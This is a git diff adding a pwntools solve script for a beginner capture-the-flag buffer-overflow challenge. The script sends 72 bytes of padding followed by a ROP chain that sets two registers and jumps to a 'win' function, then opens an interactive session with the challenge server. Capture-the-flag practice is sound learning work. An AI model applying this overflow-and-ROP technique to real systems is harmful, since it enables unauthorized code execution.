First CTFs

BOF/03_tiny_escape_room/solve.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./escape_room", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13566)
+# p.recvuntil(b"keys?\n")
+# Your exploit here
+
+var1 = 0xDEADBEEF
+var2 = 0xCAFEBABE
+OFFSET = 72
+# Gadget to overwrite rdi e rsi (pop)
+# (Creati in main.c)
+rdi = 0x401287
+rsi = 0x401289
+ret = 0x40101A
+# win addr
+win = 0x40121B
+payload = flat(
+    b"A" * OFFSET,
+    p64(rsi),
+    p64(var2),
+    p64(rdi),
+    p64(var1),
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()